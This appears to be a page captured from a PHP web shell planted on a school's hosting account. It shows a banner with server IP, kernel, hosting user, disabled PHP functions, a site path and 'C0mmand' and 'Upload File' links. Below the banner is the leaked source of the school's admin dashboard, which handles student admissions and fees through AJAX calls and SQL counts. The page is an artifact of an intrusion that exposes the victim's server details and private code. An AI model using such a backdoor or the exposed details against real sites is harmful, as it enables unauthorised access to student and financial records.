|
Server IP : 2a02:4780:11:1359:0:1d43:a566:2 / Your IP : 216.73.216.53 Web Server : LiteSpeed System : Linux in-mum-web1259.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u490972518 ( 490972518) PHP Version : 5.6.40 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : ON | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u490972518/domains/ppschool.org.in/public_html/js/../fonts/../admin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<html>
<head>
<?php include("../link/admin_headconnection.php");
include("../link/databaseconnection.php");
session_start();
$lg=$_SESSION['admin'];
if(!$lg)
{
header("location:../admin/index.php");
}
?>
<link href="../css/dashboard.css" rel="stylesheet" type="text/css"/>
<link href="../css/dashboardmenu.css" rel="stylesheet" type="text/css"/>
<link href="../css/student_details_side_menu.css" rel="stylesheet" type="text/css"/>
<link href="../css/student_details.css" rel="stylesheet" type="text/css"/>
<style>
<link href="../css/student_details.css" rel="stylesheet" type="text/css"/>
.work
{
min-height:200px;
}
.gap
{
height:100px;
}
</style>
<link href="jq/jquery.dataTables.min.css" type="text/css" rel="stylesheet"/>
<link href="jq/buttons.dataTables.min.css" type="text/css" rel="stylesheet"/>
<script src="jq/jquery.dataTables.min.js"></script>
<script src="jq/dataTables.buttons.min.js"></script>
<script src="jq/buttons.flash.min.js"></script>
<script src="jq/jszip.min.js"></script>
<script src="jq/pdfmake.min.js"></script>
<script src="jq/vfs_fonts.js"></script>
<script src="jq/buttons.html5.min.js"></script>
<script src="jq/buttons.print.min.js"></script>
<script>
///for search
$(document).ready(function(){
$("#myform21").submit(function(e){
e.preventDefault();
$.ajax({
url:"../code/student_detailscode.php?flag=36",
type:"POST",
data: new FormData(this),
contentType:false,
processData:false,
success:function(res){
//alert(res);
$("#modal").html(res);
},
error:function(){
alert("error");
}
});
});
});
///for search
//FEES UPDATE ///
function feesupdate(form)
{
var app=$("#search").val();
var a=confirm("Are you Sure");
if(a==true)
{
$.ajax({
url:"../code/student_detailscode.php?flag=43",
type:"POST",
data:new FormData(form),
contentType:false, // for photo upload ke liye hai
processData:false, //for photo upload ke liye hai
// cache:false,
success:function(res){
alert(res);
$("#editmodel89").modal("hide");
var b=confirm(" Dues Paid ! Print Slip");
if(b==true)
{
/////FOR FEES slip new
//alert(application);
$("#editbody12111").load("../code/student_detailscode.php?flag=72&app="+app);
$("#editmodel12111").modal("show");
// printDiv1();
/////FOR FEES slip new
}
},
error:function(){
alert("error");
}
});
}
return false;
}
function dues123(application)
{
//alert(application);
$("#editmodel89").modal("show");
$("#editbody89").load("../code/student_detailscode.php?flag=42&application="+application);
}
//FEES UPDATE ///
function editrow(id)
{
//alert(id);
$("#editmodel12").modal("show");
$("#editbody12").load("../code/student_detailscode.php?flag=3&id="+id);
}
function transferrow(id)
{
//alert(id);
$("#editmodel12").modal("show");
$("#editbody12").load("../code/student_detailscode.php?flag=31&id="+id);
}
/////FOR FEES DETAILS
function app1234(id)
{
//alert(application);
$("#editmodel120").modal("show");
$("#editbody120").load("../code/student_detailscode.php?flag=71&id="+id);
}
/////FOR FEES slip new
function app12345(id)
{
//alert(application);
$("#editmodel120").modal("show");
$("#editbody120").load("../code/student_detailscode.php?flag=72&id="+id);
}
/////FOR FEES slip new
function feesrow(id)
{
//alert(id);
$("#editmodel121").modal("show");
$("#editbody121").load("../code/student_detailscode.php?flag=9&id="+id);
}
//===message==//
function messagerow(id)
{
//alert(id);
$("#editmodel12").modal("show");
$("#editbody12").load("../code/student_detailscode.php?flag=7&id="+id);
}
function app12(application)
{
// alert(application);
$("#editmodel12").modal("show");
$("#editbody12").load("../code/student_detailscode.php?flag=34&application="+application);
}
function app123(application)
{
//alert(application);
$("#editmodel125").modal("show");
$("#editbody125").load("../code/student_detailscode.php?flag=27&application="+application);
}
/////FOR FEES slip new
function app12345(id)
{
//alert(application);
$("#editmodel120").modal("show");
$("#editbody120").load("../code/student_detailscode.php?flag=72&id="+id);
}
/////FOR FEES slip new
$(document).ready(function(){
///$("#modal").load("../code/student_detailscode.php?flag=36");
});
//== message==///
function deleterow(id)
{
//alert(id);
var a=confirm("Are you Sure");
if(a==true)
{
$.ajax({
url:"../code/student_detailscode.php?flag=2",
type:"POST",
data:{rowid:id},
success:function(res){
//alert(res);
//$("#modal").html(res);
$("#myform21").submit();
},
error:function(){
alert("error");
}
});
}
}
$(document).ready(function(){
//$("#modal").load("../code/student_detailscode.php?flag=1");
});
function updaterow(form)
{
$.ajax({
url:"../code/student_detailscode.php?flag=4",
type:"POST",
data:new FormData(form),
contentType:false, // for photo upload ke liye hai
processData:false, //for photo upload ke liye hai
cache:false,
success:function(res){
alert(res);
if(res=="ok")
{
$("#editmodel12").modal("hide");
$("#myform21").submit();
}
},
error:function(){
alert("error");
}
});
return false;
}
////
function changerow(form)
{
$.ajax({
url:"../code/student_detailscode.php?flag=32",
type:"POST",
data:new FormData(form),
contentType:false, // for photo upload ke liye hai
processData:false, //for photo upload ke liye hai
cache:false,
success:function(res){
alert(res);
if(res=="Transfered")
{
$("#editmodel12").modal("hide");
}
},
error:function(){
alert("error");
}
});
return false;
}
///
function result(id)
{
$("#editmodel").modal("show");
$("#editbody").load("../code/student_detailscode.php?flag=5&id="+id);
}
function go()
{
alert("ok");
$("#editmodel12").modal("show");
}
function data(form)
{
$.ajax({
url:"../code/student_detailscode.php?flag=6",
type:"POST",
data:new FormData(form),
contentType:false,
processData:false,
success:function(res){
alert(res);
if(res=="ok")
{
$("#editmodel").modal("hide");
}
},
error:function(){
alert("error");
}
});
return false;
}
function go(form)
{
$.ajax({
url:"../code/student_detailscode.php?flag=35",
type:"POST",
data:new FormData(form),
contentType:false,
processData:false,
success:function(res){
$("#editmodel").modal("hide");
},
error:function(){
alert("error");
}
});
return false;
}
function feesdata(form)
{
var app=$("#app").val();
var a=confirm("Are you Sure");
if(a==true)
{
$("#btn").prop("disabled",true);
$.ajax({
url:"../code/student_detailscode.php?flag=10",
type:"POST",
data:new FormData(form),
contentType:false,
processData:false,
success:function(res){
// alert(res);
$("#editmodel121").modal("hide");
var b=confirm(" Fees Submitted ! Print Slip");
if(b==true)
{
/////FOR FEES slip new
//alert(application);
$("#editbody12111").load("../code/student_detailscode.php?flag=72&app="+app);
$("#editmodel12111").modal("show");
// printDiv1();
/////FOR FEES slip new
}
},
error:function(){
alert("error");
}
});
}
return false;
}
</script>
<script>
function feesdatanew(form)
{
$.ajax({
url:"../code/student_detailscode.php?flag=47",
type:"POST",
data:new FormData(form),
contentType:false,
processData:false,
success:function(res){
alert(res);
$("#editmodel125").modal("hide");
},
error:function(){
alert("error");
}
});
return false;
}
</script>
</head>
<body>
<div class="container-fluid">
<div class="row">
<?php include("../link/admin_dashboardmenu .php");?>
</div>
<div class="row">
<!--menu-->
<div class="col-sm-2">
<?php include("../link/student_details_side_menu.php");?>
</div>
<!--menu--close-->
<div class="col-sm-10">
<div class="panel-group">
<div class="panel panel-primary">
<div class="panel-heading"><center><span style="font-size:22px;font-weight:bold">New Admission Students- 2019-2020 </span> <span>(Only Information for New Admission)</span></center></div>
<div class="panel-body">
<div class="row">
<?php
$sel="select * from registration where session='2019-2020' and tra='' and subject='PLAY GROUP'";
$res=mysqli_query($conn,$sel);
$s=0;
while( $row=mysqli_fetch_array($res,MYSQLI_BOTH))
{
//$sch=$row['search'];
// echo $sch;
$s++;
// echo $s;
}
$selo="select * from studentfees where year='2018-2019' and addm!='0' and class='PLAY GROUP'";
$reso=mysqli_query($conn,$selo);
$so=0;
while( $rowo=mysqli_fetch_array($reso,MYSQLI_BOTH))
{
$sch=$rowo['search'];
// echo $sch;
$so++;
// echo $s;
}
//// NURSERY
?>
<div class="col-sm-3" style="background-color:#00695c;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">PLAY GROUP</H5>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-   <?php echo $s;?><br/><br/></h5>
<center><a href='showstudent.php?flag=PLAY GROUP'><button>Show</button></a></center>
</div>
<div class="col-sm-3" style="background-color:#2BBBAD;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">NURSERY</H5>
<?php
$seln="select * from registration where session='2019-2020' and tra='' and subject='NURSERY'";
$resn=mysqli_query($conn,$seln);
$sn=0;
while( $rown=mysqli_fetch_array($resn,MYSQLI_BOTH))
{
// $sch=$rown['search'];
// echo $sch;
$sn++;
// echo $s;
}
$selno="select * from studentfees where year='2018-2019' and addm!='0' and class='NURSERY'";
$resno=mysqli_query($conn,$selno);
$sno=0;
while( $rowno=mysqli_fetch_array($resno,MYSQLI_BOTH))
{
$sch=$rowno['search'];
// echo $sch;
$sno++;
// echo $s;
}?>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-    <?php echo $sn;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=NURSERY'><button>Show</button></a></center>
</div>
<div class="col-sm-3" style="background-color:#0099CC;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">LKG</H5>
</center>
<?php
$sell="select * from registration where session='2019-2020' and tra='' and subject='LKG'";
$resl=mysqli_query($conn,$sell);
$sl=0;
while( $rowl=mysqli_fetch_array($resl,MYSQLI_BOTH))
{
// $sch=$rowl['search'];
// echo $sch;
$sl++;
// echo $s;
}
$sello="select * from studentfees where year='2018-2019' and addm!='0' and class='LKG'";
$reslo=mysqli_query($conn,$sello);
$slo=0;
while( $rowlo=mysqli_fetch_array($reslo,MYSQLI_BOTH))
{
// $sch=$rowlo['search'];
// echo $sch;
$slo++;
// echo $s;
}?>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-   <?php echo $sl;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=LKG'><button>Show</button></a></center>
</div>
<div class="col-sm-3" style="background-color:green;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">UKG</H5>
<?php
$selu="select * from registration where session='2019-2020' and tra='' and subject='UKG'";
$resu=mysqli_query($conn,$selu);
$su=0;
while( $rowu=mysqli_fetch_array($resu,MYSQLI_BOTH))
{
//$sch=$rowu['search'];
// echo $sch;
$su++;
// echo $s;
}
$seluo="select * from studentfees where year='2018-2019' and addm!='0' and class='UKG'";
$resuo=mysqli_query($conn,$seluo);
$suo=0;
while( $rowuo=mysqli_fetch_array($resuo,MYSQLI_BOTH))
{
// $sch=$rowuo['search'];
// echo $sch;
$suo++;
// echo $s;
}?>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-    <?php echo $su;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=UKG'><button>Show</button></a></center>
</div>
</div>
<BR/>
<div class="row">
<div class="col-sm-3" style="background-color:#00695c;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">FIRST</H5>
<?php
$self="select * from registration where session='2019-2020' and tra='' and subject='FIRST'";
$resf=mysqli_query($conn,$self);
$sf=0;
while( $rowf=mysqli_fetch_array($resf,MYSQLI_BOTH))
{
// $sch=$rowf['search'];
// echo $sch;
$sf++;
// echo $s;
}
$selfo="select * from studentfees where year='2018-2019' and addm!='0' and class='FIRST'";
$resfo=mysqli_query($conn,$selfo);
$sfo=0;
while( $rowfo=mysqli_fetch_array($resfo,MYSQLI_BOTH))
{
//$sch=$rowfo['search'];
// echo $sch;
$sfo++;
// echo $s;
}?>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-    <?php echo $sf;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=FIRST'><button>Show</button></a></center>
</div>
<div class="col-sm-3" style="background-color:#2BBBAD;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">SECOND</H5>
<?php
$sels="select * from registration where session='2019-2020' and tra='' and subject='SECOND'";
$ress=mysqli_query($conn,$sels);
$ss=0;
while( $rowss=mysqli_fetch_array($ress,MYSQLI_BOTH))
{
//$sch=$rowf['search'];
// echo $sch;
$ss++;
// echo $s;
}
$selso="select * from studentfees where year='2018-2019' and addm!='0' and class='SECOND'";
$resso=mysqli_query($conn,$selso);
$sso=0;
while( $rowso=mysqli_fetch_array($resso,MYSQLI_BOTH))
{
//$sch=$rowfo['search'];
// echo $sch;
$sso++;
// echo $s;
}?>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-    <?php echo $ss;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=SECOND'><button>Show</button></a></center>
</div>
<div class="col-sm-3" style="background-color:#0099CC;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">THIRD</H5>
<?php
$selt="select * from registration where session='2019-2020' and tra='' and subject='THIRD'";
$rest=mysqli_query($conn,$selt);
$st=0;
while( $rowt=mysqli_fetch_array($rest,MYSQLI_BOTH))
{
//$sch=$rowf['search'];
// echo $sch;
$st++;
// echo $s;
}
$selto="select * from studentfees where year='2018-2019' and addm!='0' and class='THIRD'";
$resto=mysqli_query($conn,$selto);
$sto=0;
while( $rowto=mysqli_fetch_array($resto,MYSQLI_BOTH))
{
//$sch=$rowfo['search'];
// echo $sch;
$sto++;
// echo $s;
}?>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-    <?php echo $st;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=THIRD'><button>Show</button></a></center>
</div>
<div class="col-sm-3" style="background-color:green;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">FOURTH</H5>
<?php
$self1="select * from registration where session='2019-2020' and tra='' and subject='FOURTH'";
$resf1=mysqli_query($conn,$self1);
$sf1=0;
while( $rowf1=mysqli_fetch_array($resf1,MYSQLI_BOTH))
{
//$sch=$rowf['search'];
// echo $sch;
$sf1++;
// echo $s;
}
$self1o="select * from studentfees where year='2018-2019' and addm!='0' and class='FOURTH'";
$resf1o=mysqli_query($conn,$self1o);
$sf1o=0;
while( $rowf1o=mysqli_fetch_array($resf1o,MYSQLI_BOTH))
{
//$sch=$rowfo['search'];
// echo $sch;
$sf1o++;
// echo $s;
}?>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-    <?php echo $sf1;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=FOURTH'><button>Show</button></a></center>
</div>
</div>
<BR/>
<div class="row">
<div class="col-sm-3" style="background-color:#00695c;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">FIFTH</H5>
<?php
$self12="select * from registration where session='2019-2020' and tra='' and subject='FIFTH'";
$resf12=mysqli_query($conn,$self12);
$sf12=0;
while( $rowf12=mysqli_fetch_array($resf12,MYSQLI_BOTH))
{
//$sch=$rowf['search'];
// echo $sch;
$sf12++;
// echo $s;
}
$self12o="select * from studentfees where year='2018-2019' and addm!='0' and class='FIFTH'";
$resf12o=mysqli_query($conn,$self12o);
$sf12o=0;
while( $rowf12o=mysqli_fetch_array($resf12o,MYSQLI_BOTH))
{
//$sch=$rowfo['search'];
// echo $sch;
$sf12o++;
// echo $s;
}?>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-    <?php echo $sf12;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=FIFTH'><button>Show</button></a></center>
</div>
<div class="col-sm-3" style="background-color:#2BBBAD;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">SIXTH</H5>
<?php
$sels12="select * from registration where session='2019-2020' and tra='' and subject='SIXTH'";
$ress12=mysqli_query($conn,$sels12);
$ss12=0;
while( $rows12=mysqli_fetch_array($ress12,MYSQLI_BOTH))
{
//$sch=$rowf['search'];
// echo $sch;
$ss12++;
// echo $s;
}
$sels12o="select * from studentfees where year='2018-2019' and addm!='0' and class='SIXTH'";
$ress12o=mysqli_query($conn,$sels12o);
$ss12o=0;
while( $rows12o=mysqli_fetch_array($ress12o,MYSQLI_BOTH))
{
//$sch=$rowfo['search'];
// echo $sch;
$ss12o++;
// echo $s;
}?>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-    <?php echo $ss12;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=SIXTH'><button>Show</button></a></center>
</div>
<div class="col-sm-3" style="background-color:#0099CC;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">SEVENTH</H5>
<?php
$sels121="select * from registration where session='2019-2020' and tra='' and subject='SEVENTH'";
$ress121=mysqli_query($conn,$sels121);
$ss121=0;
while( $rows121=mysqli_fetch_array($ress121,MYSQLI_BOTH))
{
//$sch=$rowf['search'];
// echo $sch;
$ss121++;
// echo $s;
}
$sels121o="select * from studentfees where year='2018-2019' and addm!='0' and class='SEVENTH'";
$ress121o=mysqli_query($conn,$sels121o);
$ss121o=0;
while( $rows121o=mysqli_fetch_array($ress121o,MYSQLI_BOTH))
{
//$sch=$rowfo['search'];
// echo $sch;
$ss121o++;
// echo $s;
}?>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-    <?php echo $ss121;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=SEVENTH'><button>Show</button></a></center>
</div>
<div class="col-sm-3" style="background-color:green;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">EIGHTH</H5>
<?php
$sele="select * from registration where session='2019-2020' and tra='' and subject='EIGHTH'";
$rese=mysqli_query($conn,$sele);
$se=0;
while( $rowe=mysqli_fetch_array($rese,MYSQLI_BOTH))
{
//$sch=$rowf['search'];
// echo $sch;
$se++;
// echo $s;
}
$seleo="select * from studentfees where year='2018-2019' and addm!='0' and class='EIGHTH'";
$reseo=mysqli_query($conn,$seleo);
$seo=0;
while( $roweo=mysqli_fetch_array($reseo,MYSQLI_BOTH))
{
//$sch=$rowfo['search'];
// echo $sch;
$seo++;
// echo $s;
}?>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-    <?php echo $se;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=EIGHTH'><button>Show</button></a></center>
</div>
</div>
<BR/>
<div class="row">
<div class="col-sm-3" style="background-color:#00695c;height:150px">
<center> <H5 style="color:white;font-weight:bold;background-color:red">NINTH CBSE</H5>
<?php
$sele1="select * from registration where session='2019-2020' and tra='' and subject='NINTH CBSE'";
$rese1=mysqli_query($conn,$sele1);
$se1=0;
while( $rowe1=mysqli_fetch_array($rese1,MYSQLI_BOTH))
{
//$sch=$rowf['search'];
// echo $sch;
$se1++;
// echo $s;
}
$sele1o="select * from studentfees where year='2018-2019' and addm!='0' and class='NINTH'";
$rese1o=mysqli_query($conn,$sele1o);
$se1o=0;
while( $rowe1o=mysqli_fetch_array($rese1o,MYSQLI_BOTH))
{
//$sch=$rowfo['search'];
// echo $sch;
$se1o++;
// echo $s;
}?>
</center>
<br/>
<h5 style="font-weight:bold;color:white">New Admission Total-    <?php echo $se1;?><br/><BR/></h5>
<center><a href='showstudent.php?flag=NINTH CBSE'><button>Show</button></a></center>
</div>
<div class="col-sm-2"></div>
<div class="col-sm-3" style="background-color:#00695c;height:150px">
<center> <H1 style="color:white;font-weight:bold;background-color:red">TOTAL </H1>
<?php
$sele11="select * from registration where session='2019-2020' and tra='' ";
$rese11=mysqli_query($conn,$sele11);
$se11=0;
while( $rowe11=mysqli_fetch_array($rese11,MYSQLI_BOTH))
{
//$sch=$rowf['search'];
// echo $sch;
$se11++;
// echo $s;
}
$sele1o="select * from studentfees where year='2018-2019' and addm!='0' ";
$rese1o=mysqli_query($conn,$sele1o);
$se1o=0;
while( $rowe1o=mysqli_fetch_array($rese1o,MYSQLI_BOTH))
{
//$sch=$rowfo['search'];
// echo $sch;
$se1o++;
// echo $s;
}?>
</center>
<br/>
<center><h2 style="font-weight:bold;color:RED;"> <?php echo $se11;?></h2></center>
</div>
<div class="col-sm-1">
</div>
</div>
</form>
<br/>
<div id="modal"></div>
</div>
</div>
</div>
</div>
<br/>
<br/>
<div id="show" style="display:none"></div>
</div>
<!-- modal for result-->
<div class="modal fade" id="editmodel">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-heading">
<button class="close" data-dismiss="modal"> <span> × </span> </button>
<center><h2 class="modal-title" style="color:green;background-color:yellow"> Load Data </h2> </center>
</div>
<div class="modal-body" id="editbody">
</div>
<div class="modal-footer">
</div>
</div>
</div>
</div>
<!-- modal for result-->
<!-- modal for result-->
<div class="modal fade" id="editmodel234">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-heading">
<button class="close" data-dismiss="modal"> <span> × </span> </button>
<center><h2 class="modal-title" style="color:green;background-color:yellow"> Fill Data</h2> </center>
</div>
<div class="modal-body" id="editbody1234">
</div>
<div class="modal-footer">
</div>
</div>
</div>
</div>
<!-- modal for result-->
<div class="modal fade" id="editmodel12">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-heading">
<button class="close" data-dismiss="modal"> <span> × </span> </button>
<center><h2 class="modal-title" style="color:green;background-color:yellow"> SLIP PRINT </h2> </center>
</div>
<div class="modal-body" id="editbody12">
</div>
<div class="modal-footer">
</div>
</div>
</div>
</div>
<div class="modal fade bs-example-modal-lg" id="editmodel121">
<div class="modal-dialog modal-lg">
<div class="modal-content">
<div class="modal-heading">
</div>
<div class="modal-body" id="editbody121">
</div>
<div class="modal-footer">
</div>
</div>
</div>
</div>
<div class="modal fade bs-example-modal-lg" id="editmodel125">
<div class="modal-dialog modal-lg">
<div class="modal-content">
<div class="modal-heading">
<button class="close" data-dismiss="modal"> <span> × </span> </button>
<center><h2 class="modal-title" style="color:green;background-color:yellow"> UPDATION CASH RECEIPT </h2> </center>
</div>
<div class="modal-body" id="editbody125">
</div>
<div class="modal-footer">
</div>
</div>
</div>
</div>
<!-----for dus--->
<div class="modal fade bs-example-modal-lg" id="editmodel89">
<div class="modal-dialog modal-lg">
<div class="modal-content">
<div class="modal-heading">
</div>
<div class="modal-body" id="editbody89">
</div>
<div class="modal-footer">
</div>
</div>
</div>
</div>
<!-- modal for result-->
<div class="modal fade bs-example-modal-lg" tabindex="-1" role="dialog" aria-labelledby="myLargeModalLabel" id="editmodel120">
<div class="modal-dialog modal-lg">
<div class="modal-content">
<div class="modal-heading">
<button class="close" data-dismiss="modal"> <span style='font-size:40px'> × </span> </button>
<center><h2 class="modal-title" style="color:green;background-color:yellow"> FEES DETAILS</h2> </center>
</div>
<div class="modal-body" id="editbody120">
</div>
<div class="modal-footer">
</div>
</div>
</div>
</div>
<!-- modal for slip new-->
<div class="modal fade bs-example-modal-lg" tabindex="-1" role="dialog" aria-labelledby="myLargeModalLabel" id="editmodel12111">
<div class="modal-dialog modal-lg">
<div class="modal-content">
<div class="modal-heading">
<button class="close" data-dismiss="modal"> <span style='font-size:40px'> × </span> </button>
<center><h2 class="modal-title" style="color:green;background-color:yellow"> FEES SLIP</h2> </center>
</div>
<div class="modal-body" id="editbody12111">
</div>
<div class="modal-footer">
</div>
</div>
</div>
</div>
</form>
</div>
</body>
</html>